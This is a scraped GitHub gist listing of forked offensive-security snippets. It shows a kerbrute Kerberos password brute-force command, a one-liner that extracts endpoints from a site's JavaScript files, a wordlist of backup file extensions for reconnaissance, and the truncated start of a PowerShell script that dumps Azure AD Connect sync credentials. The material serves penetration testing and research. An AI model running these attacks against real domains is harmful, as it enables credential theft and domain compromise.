With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Sachin Kamath pwnfoo
pwnfoo
/ kerberos_attacks_cheatsheet.md
Created
August 17, 2020 06:11
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
pwnfoo
/ ejs.sh
Created
April 19, 2020 17:55
— forked from gwen001/ejs.sh
onliner to extract endpoints from JS files of a given host
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu | |
| # debug mode and absolute/relative urls support (the best one): | |
| function ejs() { | |
| URL=$1; | |
| curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d |
pwnfoo
/ extensions_temp_backup.txt
Created
April 12, 2020 17:17
— forked from hackerscrolls/extensions_temp_backup.txt
Common temp and backup extensions for files and directories by twitter.com/hackerscrolls
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .0 | |
| .1 | |
| .2 | |
| .3 | |
| .tar | |
| .tgz | |
| .zip | |
| .tar.gz | |
| .rar | |
| .cache |
pwnfoo
/ azuread_decrypt_msol_v2.ps1
Created
April 11, 2020 12:58
— forked from xpn/azuread_decrypt_msol_v2.ps1
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)" | |
| Write-Host "`t[ Updated to support new cryptokey storage method ]`n" | |
| $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync" | |
| try { | |
| $client.Open() | |
| } catch { | |
| Write-Host "[!] Could not connect to localdb..." | |
| return |